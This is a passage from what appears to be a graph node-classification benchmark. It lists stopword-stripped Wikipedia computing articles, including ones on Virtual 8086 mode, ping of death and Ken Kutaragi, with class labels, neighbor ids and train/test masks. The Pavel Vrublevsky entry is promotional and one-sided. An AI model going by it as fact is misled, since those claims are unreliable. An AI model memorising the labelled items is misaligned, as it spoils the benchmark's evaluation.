internal ministry committee concluded 1 november merger would favorable cited common organization would uniform user-friendly competitive allowing shipping companies relate single organization handling registers would remain bergen despite maritime authority based haugesund merger took effect 1 january 2012 time eighteen employees agency register required certain types vessels vessels optional register norwegian ship exceeding length well oil platforms mobile installations required registered registered foreign registry volunteer registration available ships certain fishing vessels boats length used commercially mobile cranes hovercrafts docks drags fixed maritime installations used petroleum extraction nor-registered ships must norwegian nationality nationality european economic area ownership need norwegian entity although operations must norwegian owner norwegian representative ships construction norway may registered norwegian shipbuilding register open registration recreational vessels allows owner use boat collateral loan nor-registered boat also registered volunteer boat register recreational boats sometimes sold without proper reregistration times purchasers bought boats without checking see boat collateral tied",
    "neighbors": [
      41,
      3090,
      5147,
      6605
    ],
    "mask": "Test"
  },
  {
    "node_id": 6727,
    "label": 2,
    "text": "Universe_(Unix):universe unix versions unix operating system term universe used denote variant working environment late 1980s commercial unix variants derived either system v bsd versions provided bsd system v universes allowed user switch universe typically implemented separate directory trees separate filesystems usually included different versions commands libraries man pages header files facility offered ability develop applications portable across system v bsd variants requirements disk space maintenance separate configuration files twice work patching systems gave problematic reputation systems offered facility included harris/concurrent cx/ux convex convex/os apollo domain/os version 10 pyramid dc/osx dropped svr4-based version 2 concurrent masscomp/rtu mips computer systems risc/os siemens sinix versions system v release 4 retain system similar dual universe concept bsd commands behave differently classic system v commands /usr/ucb bsd header files /usr/ucbinclude library files /usr/ucblib /usr/ucb also found nextstep openstep well solaris",
    "neighbors": [
      2120,
      7983,
      5969,
      2995,
      2804,
      5492,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 6728,
    "label": 4,
    "text": "Pavel_Vrublevsky:pavel vrublevsky pavel olegovich vrublevsky born 26 december 1978 russian owner general manager processing company also founder investment company rnp russian forbes contributor matters relating blockchain cryptocurrencies cybersecurity also implicated range criminal cases related hacking pavel vrublevsky born raised moscow fifteen-year-old studied american field service student exchange program norway studied institute foreign languages named maurice thorez moved sociology department moscow state university graduated 2001 organized first company develop billing software telecommunications companies age eighteen 2003 age 23 founded company chronopay b.v 2005 chronopay entered russian market 2006 vrublevsky received prestigious runet award within three years company gained international recognition one premier processing companies cutting edge technology even though chronopay headquartered amsterdam company developed true leader processing credit card payments russia – controlling roughly 25 market share company ’ client roster boasted several russian companies well larger multinational corporations including sony microsoft russian charitable foundations non-profit organizations also use chronopay including greenpeace red cross additional clients included russia ’ second largest airline transaero country ’ largest cellphone operator mts 2011 chronopay five worldwide offices moscow amsterdam barcelona florida united states riga latvia two franchises china active business brazil 2011 company two hundred employees chronopay impact online card processing payment industry russia undeniable fact even today russia ’ internet-based payments marketplace entirely relies former chronopay personnel name largest russian bank sberbank popular e-money system russia yandex.money card associations mastercard many dozens important state banks payment providers dependent former chronopay employees unlike mckinsey company ’ impact management consulting according russian forbes today 2016 chronopay serves 25 wealthiest corporations concerning capitalization web companies russia including two four russian cell companies mts tele2 2006 vrublevsky led e-commerce commission nauet commission advocated preservation existing model collective management copyright internet vrublevsky vocal proponent one largest rights management societies time fair 2007 together good friend former producer t.a.t.u group ivan shapovalov vrublevsky purchased mp3search.ru online store actively engaged mp3 business t.a.t.u music group russia whose music chosen official russian soundtrack 2014 olympics shapovalov remained business partner vrublevsky ’ wife vera vrublevskaya russian producer long time running social network musicians along vrublevsky chronopay serving infamous online store allofmp3.com persecuted international society collective management copyrights ifpi accused infringing us negotiations russia accession wto allofmp3.com worked license roms gave organization 50 license fees 2007 appearance electronic air tickets russia vrublevsky engaged processing area organizing project e-avia chronopay e-avia processing payments major airlines largest clients transaero exception aeroflot 2010 vrublevsky proposed create national air ticket reservation system gds based e-avia ready transfer controlling stake structure aeroflot proposal find response result single russian gds never created entry force law storage personal data russians territory russian federation state-owned company rostech urgently called upon create national gds russian airline tickets kept 2009 pavel vrublevsky part working group combating spam ministry communications initiated campaign former partner igor gusev according spamhaus rating world main spammer owner largest partner spam network sale viagra glavmed experts agree commencement criminal prosecution gusev closure spamit spam 2010 global level spam fell half 2012 vrublevsky proposed redemption magazine hacker publishing house gameland also according media reports 2012 vrublevsky preparing deal buy oldest business publication country financial newspaper 1915 published jointly rf ministry finance vrublevsky also provided financial backing relaunch finansovaya gazette financial newspaper russia ’ oldest financial newspaper initially run ministry finance russia founded 1914 iconic publication published several influential voices throughout history including vladimir lenin two russia ’ well-respected financial journalists nikolai vardul raf shakirov worked vrublevsky took editorial reigns publication comeback previously vardul shakirov chief editors kommersant russia ’ known business newspaper vrublevsky chronopay ’ commitment paper survival went far housing paper time especially past economic hardships whole newspaper resided chronopay office vrublesky advocated creation national payment system long hastily created reaction sanctions vrublevsky outspoken advocacy foreign journalists brian krebs business insider falsely predicted would run system exchange cleared false allegations national booking system also something pushed eventually created russian corporation rostechnology weeks kremlin publicly embraced blockchain bitcoin pavel strongly advocated trumpeted cutting-edge technology eventually becoming russian forbes contributor ground-breaking development initially vrublevsky unsure public new industry eventually migrated become one loudest supporters 2007 pavel vrublevsky first came pressure central information security federal security service russian federation 2010 accused cis fsb russia treason promotion myth russian cyber threat 2011 arrested several times officers fsb investigating cyberattack aeroflot online payment system convicted orchestrating cyberattack sentenced 2.5 years prison 2013 granted early parole serving less year incarceration 2016 basis materials vrublevsky officers cis fsb arrested high treason led termination cooperation us russia cybercrime 2018 court sentenced colonel mikhailov cis fsb 22 years prison accomplice kaspersky lab ruslan stoyanov 14 years prison mikhailov ’ subordinate mr. dokuchaev 6 years prison accomplice mr. fomchenkov 7 years prison mr.dokuchaev separately wanted fbi usa alleged cyber attacks yahoo illicit pharmaceutical trade vrublevsky extensively targeted american journalist brian krebs fact krebs focus vrublevsky story wrote close twenty-five stories krebs enjoyed tremendous support russian fsb well written positive stories kaspersky labs major partner united states krebs scandal united states since terminated contracts kaspersky according krebs internal war corruption pavel troubled man attempted mentor igor gusev pavel taken years earlier request russian police world ’ top spammer running one top spam affiliate programs world selling fake viagra gusev became krebs primary source pavel gusev exiled russia looking settle score pavel set revelations entirely based gusevs statements stolen hacked databases chronopay vrublevsky published research origins investigations brian krebs another known cyber security researcher kimberly zenz accusing work behalf american intelligence agencies vrublevsky humorously compared krebs zenz failed world-famous russian spies boshirov petrov eventually vrublevsky central villain krebs new york times best- selling book spam nation however recent events arrests mikhailov ’ group subsequent charges dokuchaev fbi united states debunk kreb ’ narrative vrublevsky ’ role instance new york times noted arrests mikhailov ’ fsb group « amounted purge leadership cyberwing russia ’ main intelligence agency midst electoral hacking scandal issue carrying immense implications russia ’ relations united states. » interview new york times vrublevsky stated « “ guys selling fairy tales united states people business like me. ” interview cnn vrublevsky added « believe good thing countries russia us people directly responsible cyber hysteria eventually going far election meddling scandal happy since november 2016 leading column forbes electronic payments crypto-currencies particular popularization bitcoin vrublevsky ’ statements russian hackers received wide response spring summer 2017 vrublevsky conveyed number leading world media materials testifying non-involvement russian hackers attacks servers democratic party united states different years headed 2011 magazine finance included prestigious 33 pepper rating successful men age 33 2011 vrublevsky also major sponsor vtb league paying one million usd russia ’ main basketball league frequently seen along vtb league top management including mr. sergei ivanov one russia ’ influential politicians 2018 vrublevsky heads payments committee idacb.com one world ’ largest bitcoin associations founded 65 member states ultra high- rank representatives russian office idacb founded assistance mr. advisor internet president russia mr. putin frequently appears alongside vrublevsky facebook pages photos married producer vera vrublevskaya mother three children",
    "neighbors": [
      9248,
      7809,
      8805,
      4830,
      1087
    ],
    "mask": "None"
  },
  {
    "node_id": 6729,
    "label": 7,
    "text": "Velaro,_Inc.:velaro inc. velaro inc. software-as-a-service saas provider headquartered elkridge maryland company provides live chat software click-to-call intelligent engagement features current president alex bloom velaro founded 2001 velaro live chat software provider velaro integrates following systems",
    "neighbors": [
      1539,
      10090,
      5612,
      7983,
      467,
      5524
    ],
    "mask": "Test"
  },
  {
    "node_id": 6730,
    "label": 9,
    "text": "Virtual_8086_mode:virtual 8086 mode 80386 microprocessor later virtual 8086 mode also called virtual real mode v86-mode vm86 allows execution real mode applications incapable running directly protected mode processor running protected mode operating system hardware virtualization technique allowed multiple 8086 processors emulated 386 chip emerged painful experiences 80286 protected mode suitable run concurrent real mode applications well vm86 mode uses segmentation scheme identical real mode compatibility reasons creates 20-bit linear addresses manner 20-bit physical addresses created real mode subject protected mode memory paging mechanism virtual 8086 mode mode protected-mode task consequently processor switch vm86 non-vm86 tasks enabling multitasking legacy dos applications use virtual 8086 mode operating system sets virtual 8086 mode monitor program manages real-mode program emulates filters access system hardware software resources monitor must run privilege level 0 protected mode 8086 program runs vm86 mode privilege level 3 real-mode program attempts things like access certain i/o ports use hardware devices access certain regions memory space cpu traps events calls v86 monitor examines real mode program trying either acts proxy interface hardware emulates intended function real-mode program trying access terminates real-mode program trying something either allowed adequately supported reboot machine set video display mode supported hardware emulated write operating system code v86 monitor also deny permission gently emulating failure requested operation—for example make disk drive always appear ready fact even checked drive simply permit real-mode program access also v86 monitor things like map memory pages intercept calls interrupts preempt real-mode program allowing real-mode programs multitasked like protected-mode programs intercepting hardware software i/o real-mode program tracking state v86 program expects allow multiple programs share hardware without interfering v86 mode provides way real-mode programs designed single-tasking environment like dos run concurrently multitasking environment used execute certain dos programs flexos 386 since 1987 concurrent dos 386 since 1987 windows/386 2.10 since 1987 desqview 386 since 1988 windows 3.x since 1990 multiuser dos since 1991 windows workgroups 3.1x since 1992 os/2 2.x since 1992 4690 os since 1993 real/32 since 1995 running 386 enhanced mode well windows 95 98 98 se virtual dos machines sco unix merge linux dosemu dos programs use protected mode execute using user mode emulator ntvdm x86 windows nt-based operating systems also use vm86 mode limited direct hardware access common problem running 8086 code protected mode memory addressing totally different protected mode real mode mentioned working vm86 mode segmentation mechanism reconfigured work like real mode paging mechanism still active transparent real mode code thus memory protection still applicable isolation address space interrupts hardware software int instruction occur processor switches vm86 mode returns work full protected mode handle interrupt also servicing interrupt ds es fs gs registers pushed new stack zeroed pentium architecture added number enhancements virtual 8086 mode however documented intel starting subsequent p6 microarchitecture recent formal name virtual 8086 mode enhancements abbreviated vme older documentation may use extensions last word vme acronym expansion later intel 486 chips also support enhancements address mainly 8086 virtualization overhead particular focus virtual interrupts extensions publicly documented p6 documentation official documentation referred famed appendix h omitted public documentation shared selected partners nda activating vme done setting bit number 0 0x1 value cr4 vme interrupt speed-up enhancements found useful non-vm86 protected tasks also enabled separately setting bit number 1 0x2 value called pvi protected mode virtual interrupts detecting whether processor supports vme including pvi done using cpuid instruction testing value second bit bit number 1 0x2 value edx register set vme supported processor linux latter bit reported vme flag /proc/cpuinfo file flags section virtual 8086 mode basic idea iopl less 3 pushf/popf/sti/cli/int/iret instructions treat value vif real 32-bit eflags register value simulated 16-bit flags register 32-bit pushfd/popfd continues gp fault vip cause gp fault setting simulated directing os process pending interrupts pvi idea affects cli/sti instructions first generation amd ryzen cpus found feature broken vme implementation second generation ryzen 2000 series fixed issue support virtual 8086 mode available x86-64 long mode although still present 64-bit capable processors running legacy mode addition vt-x added back ability run virtual 8086 mode x86-64 long mode done transitioning physical processor vmx root mode launching logical virtual processor running virtual 8086 mode westmere later intel processors usually start logical processor directly real mode using unrestricted guest feature requires extended page tables method removes need resort nested virtual 8086 mode simply run legacy bios booting",
    "neighbors": [
      10757,
      6150,
      6153,
      4622,
      541,
      1068,
      8241,
      1085,
      2625,
      7755,
      6221,
      86,
      4695,
      8795,
      2152,
      8301,
      5234,
      634,
      3197,
      639,
      4237,
      6797,
      8851,
      2201,
      704,
      1736,
      5840,
      7377,
      6868,
      1237,
      3294,
      1247,
      5856,
      9959,
      7403,
      5356,
      242,
      3317,
      255,
      2304,
      6911,
      5380,
      6921,
      3339,
      6924,
      9490,
      11539,
      11550,
      3871,
      814,
      2355,
      9525,
      823,
      1848,
      6971,
      4424,
      11603,
      5980,
      8545,
      8551,
      8561,
      8573,
      7039,
      389,
      3973,
      5008,
      1954,
      2987,
      1972,
      3512,
      6078,
      1474,
      6596,
      5074,
      5080,
      6129,
      499
    ],
    "mask": "None"
  },
  {
    "node_id": 6731,
    "label": 2,
    "text": "Premake:premake premake open-source software development utility automatically building configuration source code features system following example premake script simple software project solution mysolution project myproject number notable uses including",
    "neighbors": [
      4777,
      10478,
      4309,
      11221,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6732,
    "label": 3,
    "text": "Namco_System_10:namco system 10 namco system 10 arcade system board released namco 2000 based sony playstation hardware preceded namco system 23 1997 succeeded namco system 246",
    "neighbors": [
      643,
      9091,
      3077,
      11398,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1587,
      1091,
      9543,
      10056,
      10316,
      6738,
      6873,
      859,
      4060,
      607,
      359,
      8937,
      3824,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "None"
  },
  {
    "node_id": 6733,
    "label": 5,
    "text": "Pool_Registrar:pool registrar computing pool registrar pr component reliable server pooling rserpool framework manages handlespace prs also denoted enrp server name server ns responsibilities pr following",
    "neighbors": [
      6723,
      6531,
      6740,
      6746,
      6682
    ],
    "mask": "Test"
  },
  {
    "node_id": 6734,
    "label": 4,
    "text": "SecureWare:secureware secureware inc. founded 1986 developed software encryption technology securing unix-based operating systems secure operating system used help secure world first internet bank security first network bank s1 technologies secureware also worked closely hp federal division develop security products trusted operating system used u.s. department defense certain military information 1996 secureware internet system security division sold hewlett packard rest secureware acquired security first network bank later year",
    "neighbors": [
      125
    ],
    "mask": "None"
  },
  {
    "node_id": 6735,
    "label": 4,
    "text": "Ping_of_death:ping death ping death type attack computer system involves sending malformed otherwise malicious ping computer correctly-formed ping packet typically 56 bytes size 64 bytes internet protocol header considered however ipv4 packet including pings may large 65,535 bytes computer systems never designed properly handle ping packet larger maximum packet size violates internet protocol documented rfc 791 like large well-formed packets ping death fragmented groups 8 octets transmission however target computer reassembles malformed packet buffer overflow occur causing system crash potentially allowing injection malicious code early implementations tcp/ip bug easy exploit affect wide variety systems including unix linux mac windows peripheral devices systems began filtering pings death firewalls detection methods different kind ping attack known ping flooding later appeared floods victim many ping requests normal traffic fails reach system basic denial-of-service attack defined rfc 791 maximum packet length ipv4 packet including ip header 65,535 2 − 1 bytes limitation presented use 16-bit wide ip header field describes total packet length underlying data link layer almost always poses limits maximum frame size see mtu ethernet typically 1500 bytes case large ip packet split across multiple ip packets also known ip fragments ip fragment match imposed limit receiver ip fragments reassemble complete ip packet continue processing usual fragmentation performed ip fragment needs carry information part original ip packet contains information kept fragment offset field ip header field 13 bits long contains offset data current ip fragment original ip packet offset given units 8 bytes allows maximum offset 65,528 2-1 *8 adding 20 bytes ip header maximum 65,548 bytes exceeds maximum frame size means ip fragment maximum offset data larger 7 bytes else would exceed limit maximum packet length malicious user send ip fragment maximum offset much data 8 bytes large physical layer allows receiver assembles ip fragments end ip packet larger 65,535 bytes may possibly overflow memory buffers receiver allocated packet cause various problems evident description problem nothing icmp used payload big enough exploit problem problem reassembly process ip fragments may contain type protocol tcp udp igmp etc. correction problem add checks reassembly process check incoming ip fragment makes sure sum fragment offset total length fields ip header ip fragment smaller equal 65,535 sum greater packet invalid ip fragment ignored check performed firewalls protect hosts bug fixed another fix problem using memory buffer larger 65,535 bytes re-assembly packet essentially breaking specification since adds support packets larger allowed 2013 ipv6 version ping death vulnerability discovered microsoft windows windows tcp/ip stack n't handle memory allocation correctly processing incoming malformed icmpv6 packets could cause remote denial service vulnerability fixed ms13-065 august 2013 cve-id vulnerability cve-2013-3183",
    "neighbors": [
      6402,
      4488,
      6797,
      4495,
      2709,
      11413,
      5402,
      8998,
      10924,
      7091,
      823,
      953,
      5179,
      1474,
      2754,
      2509,
      3024,
      4689,
      4054,
      5469,
      5470,
      5472,
      2409,
      5492,
      8692,
      10996,
      9727
    ],
    "mask": "Train"
  },
  {
    "node_id": 6736,
    "label": 8,
    "text": "GolfBOO:golfboo golfboo golf course search engine optimized towards finding golf courses online bargains co-founded 2013 antonio conde fabio peral headquartered marbella spain engine provides search tool find locations descriptions facility list reviews golf courses europe golfboo golf course search engine locates golf courses golf vacation travel packages real estate options website uses algorithms rating system search filters golfboo founded january 2013 antonio conde online marketer fabio peral former golf consultant royal troon golf club golf director la quinta lumine buenaventura located panama first version website launched june 2013 former version site focused advertised golf courses golf bargain packages later site expanded listing tee times hotels deals real estate located specific golfing spots golfboo received online exposure initial debut due fact golf-specific travel search engine comparison website first travel website curtail search optimization towards finding real estate golf recreational areas",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 6737,
    "label": 7,
    "text": "Typeform_(service):typeform service typeform barcelona-based online software service saas company specializes online form building online surveys main software creates dynamic forms based user needs typeform software used apple inc. airbnb uber nike inc. typeform produces millions forms every month typeform founded 2012 robert muñoz david okuniev typeform software released alpha phase invitation software launched beta april 2013 raised €550,000 seed funding company generated additional €1.2 million 2014 typeform software officially launched february 2014 august 2014 software 100,000 users october 2015 company raised 15 million series funding led london-based index ventures previous investors point nine capital connect ventures rta ventures ceo squarespace anthony casalena facebook vice president growth javier olivan jay parikh facebook also participated funding round june 27 2018 typeform engineering team became aware unknown third party gained access typeform server obtained access customer data downloaded attackers gained access data backups surveys conducted may 3rd 2018 100,000 records affected typeforms present questions slide one another showing one question time keep users engaged include images gifs videos tool includes calculator custom thank screens question groups allow questions added sections include sub-questions logic jump customizes questions user sees based selections form embedded website open pop-up accessed unique url form-builder uses freemium business model typeform i/o developer api creates forms based user data api allows users generate forms using code rather traditional typeform tool typeform.io standalone service connected typeform.com service discontinued early 2018 typeform launched developer platform september 2017 developer-oriented apis sdks similar typeform.io functionality integrated rest platform developers create forms programatically using create api retrieve form results using responses api webhooks perform advanced form embedding embedding sdk",
    "neighbors": [
      11347,
      467,
      5268,
      2328,
      9305
    ],
    "mask": "None"
  },
  {
    "node_id": 6738,
    "label": 3,
    "text": "Ken_Kutaragi:ken kutaragi also designed sound processor super nes sony designed vlsi chip works conjunction ps1 risc cpu handle graphics rendering kutaragi closely watched financial analysts trace profiles losses profits sony corporation ken kutaragi born tokyo japan parents although wealthy japanese standards still managed business small printing plant city kutaragi grew childhood actively encouraged young boy explore mechanical abilities plant worked school aside duties parents factory kutaragi studious high-level student often described straight student kutaragi always desire tinker often taking apart toys child rather playing curiosity carried childhood leading teenager learn intricacies electronics eventually fact love electronics led enrolling university electro-communications acquired electronics degree 1970 immediately graduation kutaragi began working sony digital research labs mid-1970 although time considered radical decision kutaragi felt sony fast track quickly gained reputation excellent problem solver forward thinking engineer earning reputation working many successful projects including early liquid crystal displays lcds digital cameras late 1980s watching daughter play famicom realized potential existed within video games particular time sony executives interest video games thus nintendo expressed need sound chip upcoming new 16-bit system kutaragi accepted offer working secret designed chip spc700 found sony executives furious sony ceo norio ohga approval kutaragi able complete chip keep job even working nintendo within sony gaming still regarded fad despite hostile atmosphere video games kutaragi managed persuade norio ohga making two devices snes add-on snes-cd sony branded console could play snes-cd games nintendo cartridges efforts resulted device called play station console would compatible super famicom games software released new format called superdisc eventually partnership sony nintendo faltered due licensing disagreements kutaragi sony continued develop console kutaragi later recalled staying night working console design several nights row work interesting despite considered risky gamble sony executives kutaragi support norio ohga several years later company released original playstation success playstation led heading development consoles like playstation 2 successor playstation 3 commercial success playstation franchise makes sony computer entertainment profitable business division sony despite upstart console market veterans nintendo sega first playstation displaced become popular console era playstation 2 extended sony lead following generation one point holding 65 market share 100 million units shipped ken recognized many financial technological publications success notably named one 100 influential people 2004 time magazine gutenberg video games 1997 kutaragi appointed ceo sony computer entertainment america accordingly moved california since 1997 kutaragi favoured become next sony president enjoyed close relationship sony ceo norio ohga backed kutaragi sound chip playstation projects ohga successor nobuyuki idei promoted kutaragi deputy executive president sony-global chief operating officer vice-chairman 2003 november 30 2006 kutaragi replaced president sony computer entertainment kaz hirai president sce america addition management changes kutaragi promoted chairman scei retained position chief executive officer group april 26 2007 announced kutaragi would retire instead take role honorary chairman taking position would scei president ceo kaz hirai would eventually promoted president ceo sony june 29 2011 following reshuffling management sony announced june 28 2011 kutaragi stepped honorary chairman scei kutaragi relinquished active management business created built 2007 stepped executive chairman group ceo sony computer entertainment remained sony senior technology advisor ken kutaragi later became president ceo cyber ai entertainment inc also serves boards kadokawa group holdings inc. nojima corporation rakuten inc 2009 became visiting professor ritsumeikan university although kutaragi leadership consumer electronics successful analysts also suspect outgoing sony ceo nobuyuki idei set kutaragi fail given men cool working relationship idei assigned kutaragi tedious task turning around consumer division already falling behind competitors samsung lcd market kutaragi rival top position howard stringer given less difficult assignment content business success sony bmg music entertainment resulted promotion sony computer entertainment kutaragi heading since inception weaker year 2004 several years solid growth year sony ’ game sales fell 7.5 billion 8.2 billion operating income slid 650 million 1 billion losing 25 million q4 2004 attributed partially over-saturation video game market price wars caused ps2 lose top sales position time kutaragi labelled xbox 360 xbox 1.5 stated going playstation 2 however sce executive tetsuhiko yasuda consider microsoft competitor said might consider working games together september 2006 kutaragi admitted shortage playstation 3 consoles north america japan well postponing consoles debut europe put sony strength hardware decline",
    "neighbors": [
      9472,
      10368,
      643,
      9091,
      3077,
      10761,
      6799,
      9508,
      9126,
      6311,
      9512,
      684,
      9391,
      306,
      1587,
      7218,
      6072,
      8120,
      1985,
      1091,
      9543,
      6909,
      6732,
      10316,
      3025,
      342,
      6873,
      1115,
      859,
      4060,
      3677,
      607,
      9445,
      359,
      8937,
      10985,
      4587,
      3824,
      8316,
      5746,
      6004,
      2293,
      7028,
      1784,
      7801,
      3323,
      6268,
      6781
    ],
    "mask": "Test"
  },
  {
    "node_id": 6739,
    "label": 3,
    "text": "JMP_(x86_instruction):jmp x86 instruction x86 assembly language codice_1 instruction performs unconditional jump instruction transfers flow execution changing instruction pointer register number different opcodes perform jump depending whether processor real mode protected mode override instruction used instructions may take 16-bit 32-bit segment offset pointers many different forms jumps relative conditional absolute register-indirect jumps following examples illustrate note although first second jumps relative commonly destination address shown instead relative offset encoded opcode example one load ip new value codice_2 load cs codice_3 ip codice_4 example two load eip value codice_5 protected mode unreal mode example three jump value stored eax register protected mode",
    "neighbors": [
      547,
      6596,
      8716,
      10796,
      372,
      5080,
      1915,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 6740,
    "label": 5,
    "text": "Pool_Element:pool element pool element pe server reliable server pooling rserpool framework responsibilities pe following",
    "neighbors": [
      6746,
      6682,
      6531,
      6733
    ],
    "mask": "Test"
  },
  {
    "node_id": 6741,
    "label": 3,
    "text": "ND812:nd812 12-bit nd812 produced nuclear data inc. commercial minicomputer developed scientific computing market nuclear data introduced 1970 price 10,000 architecture simple programmed i/o bus plus dma channel programmed i/o bus typically runs low medium-speed peripherals printers teletypes paper tape punches readers dma used cathode ray tube screens light pen analog-to-digital converters digital-to-analog converters tape drives disk drives word size 12 bits large enough handle unsigned integers 0 4095 – wide enough controlling simple machinery also enough handle signed numbers -2048 +2047 higher precision slide rule analog computers twelve bits could also store two six-bit characters note six-bit n't enough two cases unlike fuller ascii character set nd code one 6-bit character encoding included upper-case alphabetic digit subset punctuation control characters nd812 basic configuration main memory 4,096 twelve-bit words 2 microsecond cycle time memory expandable 16k words 4k word increments bits within word numbered significant bit bit 11 least significant bit bit 0 programming model consists four accumulator registers two main accumulators j k two sub accumulators r s. rich set arithmetic logical operations provided main accumulators instructions provided exchange data main sub accumulators conditional execution provided skip instructions condition tested subsequent instruction either executed skipped depending result test subsequent instruction usually jump instruction one instruction needed case test fails i/o facilities include programmable interrupts 4-levels priority trap location first 4k words memory i/o transmit 12 24 bits receive 12 24 bits transmit receive 12 bits cycle i/o instructions include 4 bits creating pulses peripheral control i/o peripherals attached via 76 signal connector allows direct memory access peripherals dma accomplished cycle stealing cpu store words directly core memory system nuclear data provided interfaces following peripherals nd812 operating system front panel run halt switches i/o facility allowed peripherals directly load programs memory computer halted executing instructions another option enter short loader program would used bootstrap desired program peripheral teletype paper tape reader since core memory non-volatile shutting computer result data program loss number system programs made available nuclear data use nd812 basc-12 assembler symbolic text editor nutran interpreter disk-based symbolic text editor assembler called basc-12 provided basc-12 two-pass assembler optional third pass pass one generates symbol table pass two produces binary output tape pass three provides listing program sample assembler principles programming nd812 computer manual shown nutran conversational fortran-like language provided nutran intended general scientific programming sample nutran shown example conversational nature nutran shown codice_1 command prompt codice_2 input prompt instruction set consists single double word instructions operands immediate direct indirect immediate operands encoded directly instruction literal value direct operands encoded address operand indirect operands encode address word containing pointer operand displacement sign bit allow single word instructions address locations -63 +63 location instruction bit 4 instruction allows choice indirect direct addressing displacement used indirect address contents location +/-63 locations instruction location used pointer actual operand many single word instructions reference memory use bits 4 5 part specification operation group 1 instructions perform arithmetic logical exchange shifting functions accumulator registers includes hardware multiply divide instructions bit 4 set k register affected bit 5 set j register affected bits set registers affected group 2 format instructions test internal conditions j k accumulator registers manipulate overflow flag status bits provide complement increment negation operations j k accumulator registers bits 9 10 11 select condition tested bit 9 change fields inhibits absolute address referencing different field one containing instruction bit 8 1 upper accumulator k used instruction otherwise lower accumulator j used bit 7 1 indirect addressing used otherwise direct addressing used status register doest exist distinct register contents several groups indicators stored j register desired jps int bits hold current field contents would used jps instruction interrupt flag overflow bits set explicitly j register contents rfov instruction bits must set distinct instructions nd812 processor provides simple stack operands n't use mechanism storing subroutine return addresses instead return address stored target codice_3 instruction codice_4 register updated point location following stored return address return subroutine indirect jump initial location subroutine restores program counter instruction following codice_3 instruction",
    "neighbors": [
      7401,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 6742,
    "label": 9,
    "text": "Transaction_Application_Language:transaction application language transaction application language tal originally tandem application language block-structured procedural language optimized use tandem hardware tal resembles cross c pascal original system programming language tandem cisc machines assembler design concept tal evolution hewlett packard spl intimately associated optimized microprogrammed cisc instruction set tal statement could easily compile sequence instructions manipulated data transient floating register stack register stack floated crest program memory allocation call stack language appearance algol pascal begin end statements however semantics far like c. permit indefinite levels procedure nesting pass complex structured arguments value strictly type variable references programming techniques much like c using pointers structures occasional overlays deliberate string handling casts appropriate available datatypes include 8 bit 16 bit 32 bit introduced later 64 bit integers microcode level support available null terminated character strings however commonly used originally tandem nonstop operating system written tal recently much rewritten c tal deprecated new development migration cisc risc tal updated/replaced ptal compilers allowed tal accelerated/re-compiled native risc applications current migration risc intel itanium 2 tal ptal replaced eptal compilers allow tal ptal code accelerated/re-compiled native itanium applications",
    "neighbors": [
      512,
      477,
      6722,
      7173,
      1606,
      4998,
      8262,
      8524,
      2638,
      7983,
      5040,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6743,
    "label": 2,
    "text": "The_Unix-Haters_Handbook:unix-haters handbook unix-haters handbook semi-humorous edited compilation messages unix-haters mailing list book edited simson garfinkel daniel weise steven strassmann published 1994 book made available download free electronic format 2003 book concerns frustrations users unix operating system many users come systems felt far sophisticated computer science terms tremendously frustrated worse better design philosophy felt unix much software encapsulated book based messages sent unix-haters mailing list 1988 1993 contains foreword human factors guru norman anti-foreword dennis ritchie one creators operating system many book complaints unix operating system based design decisions fact shell expands wildcards means wildcards used filenames usernames times things example large proportion complaints anomalies command line interface many complaints still valid complaints book addressed time lack journaling file system criticisms operating system graphical user interface book predates rise linux thus concerns several commercial versions unix available inconsistencies another major complaint book —most replaced inconsistencies different versions linux incompatibilities various versions linux linux macos book printed trade paperback front cover designed similar scream air sickness bag printed phrase unix barf bag inserted inside back cover every copy publisher front-matter page dedication says ken dennis without book would possible references ken thompson dennis ritchie creators unix",
    "neighbors": [
      4360,
      4398,
      7983,
      5492,
      823,
      9335
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6744,
    "label": 2,
    "text": "Comparison_of_Start_menu_replacements_for_Windows_8:comparison start menu replacements windows 8 microsoft windows 8 operating system introduced updated start menu known start screen uses full-screen design consisting tiles represent applications replaced windows desktop primary interface operating system additionally on-screen start button replaced hidden button corner screen microsoft explained start button removed people used noting addition pinning apps taskbar windows 7 change controversial among users market ensued applications restore visible start button emulate previous start menu design allow users boot directly desktop instead start screen following list start menu replacements windows 8 received coverage third-party sources number skins table givens number built-in skins downloadable skins appended number indicate download extensions possible retroui startisback classic shell start8 pokki five notable retroui offered 33 languages also windows server 2012 adds taskbar resizable windows startisback also localized classic shell used free open source proprietary freeware major items localized installing language pack windows update makes items fully localized classic shell also available windows 7 windows server claims 25 million downloads pokki download restore start menu free january 2013 1.5 million users pokki application platform based chromium enables desktop applications built—like mobile apps—using standard web languages like html5 css3 javascript also available windows xp windows 7 pokki raised 21.5m investors like google intel o'reilly business model make commission software sold app store start8 downloaded 5 million times",
    "neighbors": [
      10989,
      877,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 6745,
    "label": 0,
    "text": "Semantic_analysis_(computational):semantic analysis computational semantic analysis computational composite semantic analysis computational components semantic analysis refers formal analysis meaning computational refers approaches principle support effective implementation digital computers",
    "neighbors": [
      1890,
      7780,
      1737,
      10452,
      5781
    ],
    "mask": "Test"
  },
  {
    "node_id": 6746,
    "label": 5,
    "text": "Pool_User:pool user pool user pu client reliable server pooling rserpool framework order use service provided pool pu proceed following steps",
    "neighbors": [
      6531,
      4490,
      6733,
      6740,
      6682
    ],
    "mask": "None"
  },
  {
    "node_id": 6747,
    "label": 5,
    "text": "QtWeb:qtweb qtweb discontinued free open-source web browser developed logicware lsoft technologies qtweb used webkit browser engine embedded qt framework qtweb described lightweight web browser offers amount customisable features speed simplicity navigate however criticised lack extensions support way run java problems work several websites",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      106,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      637,
      1664,
      2182,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      6361,
      8923,
      737,
      4326,
      8443,
